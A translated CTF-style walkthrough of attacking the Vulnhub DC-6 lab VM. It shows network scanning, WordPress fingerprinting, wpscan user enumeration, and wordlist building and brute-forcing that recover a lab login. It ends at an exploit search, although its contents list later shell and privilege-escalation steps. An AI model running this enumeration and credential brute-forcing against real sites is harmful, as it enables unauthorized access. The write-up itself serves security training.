Disclaimer
This document is for learning and research only. Do not use the techniques or source code in it for illegal purposes; the author bears no responsibility for any negative consequences caused by anyone.
Contents
- Disclaimer
- Preface
- 1. Environment setup
- 2. Information gathering
- 2.1 Host discovery
- 2.1.1 nmap scan for live hosts
- 2.1.2 arp-scan for live hosts
- 2.2 Port scan
- 2.3 Fingerprinting
- 2.3.1 First fingerprinting attempt
- 2.3.2 Edit the hosts file
- 2.3.3 Fingerprint again
- 2.3.4 Browser access
- 2.3.5 Web fingerprinting with the Wappalyzer plugin
- 2.4 Directory scan
- 2.4.1 Directory scan with dirb
- 2.4.2 Directory scan with dirsearch
- 2.5 Access attempts
- 2.5.1 Try accessing wp-admin
- 2.5.2 Try accessing wp-includes
- 3. Penetration testing
- 3.1 Enumerating usernames with wpscan
- 3.1.1 Enumerate usernames
- 3.1.2 Save the username list
- 3.2 Generate the password dictionary
- 3.3 Web login brute force
- 3.3.1 wpscan brute force
- 3.3.2 hydra brute force
- 3.4 The mark user
- 3.4.1 Login page
- 3.4.2 Tools plugin
- 3.4.3 Vulnerability search
- 3.4.4 Inspect the poc file
- 3.4.5 Run the poc file
- 3.4.6 Reverse shell
- 3.4.6.1 Listen on port 6666 in Kali
- 3.4.6.2 Reverse shell
- 3.4.6.3 Spawn a proper terminal
- 3.4.7 Try SUID privilege escalation
- 3.4.8 More system information
- 3.5 The graham user
- 3.5.1 Switch to graham
- 3.5.2 Try sudo privilege escalation again
- 3.5.3 Write bash into backups.sh
- 3.6 The jens user
- 3.6.1 Switch to jens
- 3.6.2 Check SUID executables
- 3.6.3 Check sudo-executable commands
- 3.7 nmap privilege escalation
- 3.7.1 Create shell.nse
- 3.7.2 Execute shell.nse
- 3.7.3 View the flag
- Summary
- References
Preface
Today's test: penetrating the DC-6 target machine.
Vulnhub is a range platform that provides all kinds of vulnerable environments; most are ready-made virtual machine images preloaded with multiple vulnerabilities.
This article walks through a penetration test of the DC-6 target, covering nmap and arp-scan scanning, whatweb and Wappalyzer fingerprinting, directory scanning with dirb or dirsearch, enumerating WordPress usernames with wpscan, generating a password dictionary, brute-forcing the login page with wpscan and xhydra, and finally obtaining root through nmap privilege escalation, Linux kernel privilege escalation, and so on.
DESCRIPTION
DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This isn’t an overly difficult challenge so should be great for beginners.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
1. Environment setup
Target information
Official download link | https://www.vulnhub.com/entry/dc-6,315/ |
---|---|
Release date | 29 April 2019 |
Image size | 619MB |
Author | DCAU |
Series | DC |
Difficulty | ★☆☆☆☆ |
For the penetration-testing environment setup, refer to the author's earlier post; it is not repeated here:
Vulnhub range practice series - DC-2: https://editor.csdn.net/md/?articleId=139026849
2. Information gathering
2.1 Host discovery
2.1.1 nmap scan for live hosts
┌──(root㉿kali)-[/home/kali]
└─# nmap -sP 192.168.6.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 11:04 EDT
Nmap scan report for 192.168.6.1
Host is up (0.00037s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.6.2
Host is up (0.00045s latency).
MAC Address: 00:50:56:F5:7B:9F (VMware)
Nmap scan report for 192.168.6.157
Host is up (0.00050s latency).
MAC Address: 00:0C:29:C2:C2:87 (VMware)
Nmap scan report for 192.168.6.254
Host is up (0.00037s latency).
MAC Address: 00:50:56:F1:DB:25 (VMware)
Nmap scan report for 192.168.6.66
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 28.09 seconds
2.1.2 arp-scan for live hosts
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1 00:50:56:c0:00:08 VMware, Inc.
192.168.6.2 00:50:56:f5:7b:9f VMware, Inc.
192.168.6.157 00:0c:29:c2:c2:87 VMware, Inc.
192.168.6.254 00:50:56:f1:db:25 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.324 seconds (110.15 hosts/sec). 4 responded
Combining the two scans and excluding the Kali attacker's own IP, the target is:
IP address: 192.168.6.157
MAC address: 00:0c:29:c2:c2:87
2.2 Port scan
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-7 192.168.6.157
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 11:07 EDT
Nmap scan report for 192.168.6.157
Host is up (0.00044s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Did not follow redirect to http://wordy/
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 00:0C:29:C2:C2:87 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.35 seconds
The nmap port scan shows that the target has ports 22 and 80 open:
Port 22: SSH service
Port 80: HTTP service
2.3 Fingerprinting
2.3.1 First fingerprinting attempt
┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.157
WhatWeb report for http://192.168.6.157
Status : 301 Moved Permanently
Title : <None>
IP : 192.168.6.157
Country : RESERVED, ZZ
Summary : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], RedirectLocation[http://wordy/], UncommonHeaders[x-redirect-by]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.25 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.25 (Debian) (from server string)
[ RedirectLocation ]
HTTP Server string location. used with http-status 301 and
302
String : http://wordy/ (from location)
[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com
String : x-redirect-by (from headers)
HTTP Headers:
HTTP/1.1 301 Moved Permanently
Date: Tue, 28 May 2024 15:11:47 GMT
Server: Apache/2.4.25 (Debian)
X-Redirect-By: WordPress
Location: http://wordy/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Result: the target runs the WordPress CMS, but no WordPress version was obtained because the request is redirected to http://wordy/. The fix is the next step.
2.3.2 Edit the hosts file
Add the following line to the hosts file:
192.168.6.157 wordy
┌──(root㉿kali)-[/home/kali]
└─# vim /etc/hosts
┌──(root㉿kali)-[/home/kali]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.6.154 dc-2
192.168.6.157 wordy
2.3.3 Fingerprint again
┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.157
WhatWeb report for http://192.168.6.157
Status : 301 Moved Permanently
Title : <None>
IP : 192.168.6.157
Country : RESERVED, ZZ
Summary : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], RedirectLocation[http://wordy/], UncommonHeaders[x-redirect-by]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.25 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.25 (Debian) (from server string)
[ RedirectLocation ]
HTTP Server string location. used with http-status 301 and
302
String : http://wordy/ (from location)
[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com
String : x-redirect-by (from headers)
HTTP Headers:
HTTP/1.1 301 Moved Permanently
Date: Tue, 28 May 2024 15:25:30 GMT
Server: Apache/2.4.25 (Debian)
X-Redirect-By: WordPress
Location: http://wordy/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
WhatWeb report for http://wordy/
Status : 200 OK
Title : Wordy – Just another WordPress site
IP : 192.168.6.157
Country : RESERVED, ZZ
Summary : Apache[2.4.25], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], JQuery[1.12.4], MetaGenerator[WordPress 5.1.1], PoweredBy[WordPress], Script[text/javascript], UncommonHeaders[link], WordPress[5.1.1]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.25 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.25 (Debian) (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Version : 1.12.4
Website : http://jquery.com/
[ MetaGenerator ]
This plugin identifies meta generator tags and extracts its
value.
String : WordPress 5.1.1
[ PoweredBy ]
This plugin identifies instances of 'Powered by x' text and
attempts to extract the value for x.
String : WordPress
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
String : text/javascript
[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com
String : link (from headers)
[ WordPress ]
WordPress is an opensource blogging system commonly used as
a CMS.
Version : 5.1.1
Aggressive function available (check plugin file or details).
Google Dorks: (1)
Website : http://www.wordpress.org/
HTTP Headers:
HTTP/1.1 200 OK
Date: Tue, 28 May 2024 15:25:32 GMT
Server: Apache/2.4.25 (Debian)
Link: <http://wordy/index.php/wp-json/>; rel="https://api.w.org/"
Link: <http://wordy/>; rel=shortlink
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 18051
Connection: close
Content-Type: text/html; charset=UTF-8
2.3.4 Browser access
2.3.5 Web fingerprinting with the Wappalyzer plugin
The technology stack reported is as follows:
Item | Technology |
---|---|
Content management system | WordPress 5.1.1 |
Programming language | PHP |
Blog | WordPress 5.1.1 |
Operating system | Debian |
Fonts | Google Font API, Twitter Emoji (Twemoji) |
Database | MySQL |
Miscellaneous | RSS |
JavaScript libraries | jQuery Migrate 1.4.1, jQuery 1.12.4 |
Web server | Apache HTTP Server 2.4.25 |
WordPress theme | Twenty Seventeen |
In summary, the WordPress version is now known:
Version : 5.1.1
2.4 Directory scan
2.4.1 Directory scan with dirb
┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.6.157
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue May 28 12:02:29 2024
URL_BASE: http://192.168.6.157/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.6.157/ ----
+ http://192.168.6.157/index.php (CODE:200|SIZE:53227)
+ http://192.168.6.157/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.6.157/wp-admin/
==> DIRECTORY: http://192.168.6.157/wp-content/
==> DIRECTORY: http://192.168.6.157/wp-includes/
+ http://192.168.6.157/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.6.157/wp-admin/ ----
+ http://192.168.6.157/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.6.157/wp-admin/css/
==> DIRECTORY: http://192.168.6.157/wp-admin/images/
==> DIRECTORY: http://192.168.6.157/wp-admin/includes/
+ http://192.168.6.157/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.6.157/wp-admin/js/
==> DIRECTORY: http://192.168.6.157/wp-admin/maint/
==> DIRECTORY: http://192.168.6.157/wp-admin/network/
==> DIRECTORY: http://192.168.6.157/wp-admin/user/
---- Entering directory: http://192.168.6.157/wp-content/ ----
+ http://192.168.6.157/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.6.157/wp-content/plugins/
==> DIRECTORY: http://192.168.6.157/wp-content/themes/
==> DIRECTORY: http://192.168.6.157/wp-content/uploads/
---- Entering directory: http://192.168.6.157/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.6.157/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.6.157/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.6.157/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.6.157/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.6.157/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.6.157/wp-admin/network/ ----
+ http://192.168.6.157/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.6.157/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.6.157/wp-admin/user/ ----
+ http://192.168.6.157/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.6.157/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.6.157/wp-content/plugins/ ----
+ http://192.168.6.157/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.6.157/wp-content/themes/ ----
+ http://192.168.6.157/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.6.157/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue May 28 12:03:03 2024
DOWNLOADED: 32284 - FOUND: 12
2.4.2 Directory scan with dirsearch
┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.157 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481
Output File: /home/kali/reports/_192.168.6.157/_24-05-28_12-05-18.txt
Target: http://192.168.6.157/
[12:05:18] Starting:
[12:05:21] 403 - 299B - /.ht_wsr.txt
[12:05:21] 403 - 302B - /.htaccess.orig
[12:05:21] 403 - 302B - /.htaccess.save
[12:05:21] 403 - 304B - /.htaccess.sample
[12:05:21] 403 - 302B - /.htaccess.bak1
[12:05:22] 403 - 300B - /.htaccess_sc
[12:05:22] 403 - 300B - /.htaccessBAK
[12:05:22] 403 - 301B - /.htaccessOLD2
[12:05:22] 403 - 292B - /.htm
[12:05:22] 403 - 293B - /.html
[12:05:22] 403 - 302B - /.htpasswd_test
[12:05:22] 403 - 298B - /.htpasswds
[12:05:22] 403 - 302B - /.htaccess_orig
[12:05:22] 403 - 299B - /.httr-oauth
[12:05:22] 403 - 303B - /.htaccess_extra
[12:05:22] 403 - 300B - /.htaccessOLD
[12:05:24] 403 - 292B - /.php
[12:05:24] 403 - 293B - /.php3
[12:06:05] 200 - 18KB - /index.php
[12:06:09] 200 - 7KB - /license.txt
[12:06:28] 200 - 3KB - /readme.html
[12:06:31] 403 - 301B - /server-status
[12:06:31] 403 - 302B - /server-status/
[12:06:50] 301 - 317B - /wp-admin -> http://192.168.6.157/wp-admin/
[12:06:50] 302 - 0B - /wp-admin/ -> http://wordy/wp-login.php?redirect_to=http%3A%2F%2F192.168.6.157%2Fwp-admin%2F&reauth=1
[12:06:51] 200 - 0B - /wp-config.php
[12:06:51] 500 - 3KB - /wp-admin/setup-config.php
[12:06:51] 400 - 1B - /wp-admin/admin-ajax.php
[12:06:51] 200 - 517B - /wp-admin/install.php
[12:06:51] 301 - 319B - /wp-content -> http://192.168.6.157/wp-content/
[12:06:51] 200 - 0B - /wp-content/
[12:06:51] 403 - 324B - /wp-content/plugins/akismet/admin.php
[12:06:51] 500 - 0B - /wp-content/plugins/hello.php
[12:06:51] 403 - 326B - /wp-content/plugins/akismet/akismet.php
[12:06:51] 200 - 456B - /wp-content/uploads/
[12:06:52] 200 - 1KB - /wp-login.php
[12:06:52] 302 - 0B - /wp-signup.php -> http://wordy/wp-login.php?action=register
[12:06:52] 500 - 0B - /wp-includes/rss-functions.php
[12:06:52] 200 - 0B - /wp-cron.php
[12:06:52] 200 - 4KB - /wp-includes/
[12:06:52] 301 - 320B - /wp-includes -> http://192.168.6.157/wp-includes/
[12:06:53] 405 - 42B - /xmlrpc.php
Task Completed
In summary, a few notable paths were found:
Page | Path |
---|---|
Admin dashboard | /wp-admin -> http://192.168.6.157/wp-admin/ |
File includes directory | /wp-includes -> http://192.168.6.157/wp-includes/ |
Site content directory | /wp-content -> http://192.168.6.157/wp-content/ |
Registration page | /wp-signup.php -> http://wordy/wp-login.php?action=register |
The DC-6 target has vulnerabilities such as file inclusion and unauthorized access, O(∩_∩)O haha~
2.5 Access attempts
2.5.1 Try accessing wp-admin
URL: http://192.168.6.157/wp-admin/
Returned page:
2.5.2 Try accessing wp-includes
URL: http://192.168.6.157/wp-includes/
Returned page:
Without logging in, access is denied. Plan: brute-force usernames and passwords.
3. Penetration testing
3.1 Enumerating usernames with wpscan
3.1.1 Enumerate usernames
┌──(root㉿kali)-[/home/kali]
└─# wpscan --url http://wordy -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://wordy/ [192.168.6.157]
[+] Started: Tue May 28 12:44:35 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://wordy/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
| Found By: Rss Generator (Passive Detection)
| - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
| - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://wordy/wp-content/themes/twentyseventeen/
| Last Updated: 2024-04-02T00:00:00.000Z
| Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.6
| Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue May 28 12:44:44 2024
[+] Requests Done: 71
[+] Cached Requests: 6
[+] Data Sent: 16.392 KB
[+] Data Received: 13.463 MB
[+] Memory used: 190.902 MB
[+] Elapsed time: 00:00:08
Five usernames obtained:
Usernames | admin | graham | jens | mark | sarah |
---|---|---|---|---|---|
3.1.2 Save the username list
Run the following commands in turn to save the usernames to users.txt:
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# echo "admin\ngraham\njens\nmark\nsarah"> users.txt
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# ls
users.txt
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cat users.txt
admin
graham
jens
mark
sarah
The username dictionary is saved.
3.2 Generate the password dictionary
When visiting the official page for this target, there was the following hint:
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# ls
passwords.txt users.txt
The password dictionary passwords.txt is generated.
3.3 Web login brute force
Both wpscan and xhydra can brute-force the web login page; they are covered in turn below.
3.3.1 wpscan brute force
This took about 6 minutes 33 seconds!
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# wpscan --url http://wordy -U users.txt -P passwords.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://wordy/ [192.168.6.157]
[+] Started: Tue May 28 13:43:00 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://wordy/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
| Found By: Rss Generator (Passive Detection)
| - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
| - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://wordy/wp-content/themes/twentyseventeen/
| Last Updated: 2024-04-02T00:00:00.000Z
| Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.6
| Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=========================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - mark / helpdesk01
Trying jens / !lak019b Time: 00:06:33 <=============================================== > (12547 / 15215) 82.46% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: mark, Password: helpdesk01
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue May 28 13:49:47 2024
[+] Requests Done: 12720
[+] Cached Requests: 5
[+] Data Sent: 6.222 MB
[+] Data Received: 7.74 MB
[+] Memory used: 312.531 MB
[+] Elapsed time: 00:06:46
3.3.2 hydra brute force
Use xhydra to brute-force the web login page,
with the following settings:
Target: 192.168.6.157
Protocol: http-post-form
Username List: /home/kali/dev_run_app/vulhub/dc-6/users.txt
Password List: /home/kali/dev_run_app/vulhub/dc-6/passwords.txt
Specific settings:
http/https URL: /wp-admin.php:log=USER&pwd=PASS:s=logout
Finally click Start.
No result, O(∩_∩)O haha~ pass
In summary, one username and password were obtained:
No. | Username | Password |
---|---|---|
1 | mark | helpdesk01 |
3.4 The mark user
3.4.1 Login page
Log in to the admin page with the credentials obtained by brute force.
Admin page: http://192.168.6.157/wp-admin/
3.4.2 Tools plugin
After logging in, the Activity monitor plugin is found.
Try whoami:
Try the id command:
In summary, the plugin has an RCE (remote command execution) vulnerability.
3.4.3 Vulnerability search
┌──(root㉿kali)-[/home/kali]
└─# searchsploit -w Activity monitor
----------------------------------------------------------------------------------------------------------------- --------------------------------------------
Exploit Title | URL
----------------------------------------------------------------------------------------------------------------- --------------------------------------------
Activity Monitor 2002 2.6 - Remote Denial of Service | https://www.exploit-db.com/exploits/22690
RedHat Linux 6.0/6.1/6.2 - 'pam_console' Monitor Activity After Logout | https://www.exploit-db.com/exploits/19900
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection | https://www.exploit-db.com/exploits/45274
WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2) | https://www.exploit-db.com/exploits/50110
----------------------------------------------------------------------------------------------------------------- --------------------------------------------
Shellcodes: No Results
